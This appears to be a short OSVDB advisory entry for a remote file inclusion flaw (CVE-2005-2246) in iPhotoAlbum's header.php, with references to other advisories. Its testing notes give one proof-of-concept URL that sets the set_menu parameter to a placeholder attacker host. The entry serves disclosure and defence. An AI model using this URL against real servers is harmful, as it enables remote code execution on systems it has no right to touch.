iPhotoAlbum header.php set_menu Variable Remote File Inclusion

2005-07-09T11:28:08
ID OSVDB:17890
Type osvdb
Reporter OSVDB
Modified 2005-07-09T11:28:08

Description

Manual Testing Notes

http://[target]/[path_to_iPhotoAlbum]/lib/static/header.php?set_menu=http://[attacker]/

References:

Security Tracker: 1014448
Secunia Advisory ID: 16031
Related OSVDB ID: 17889
Mail List Post: http://attrition.org/pipermail/vim/2007-March/001474.html
CVE-2005-2246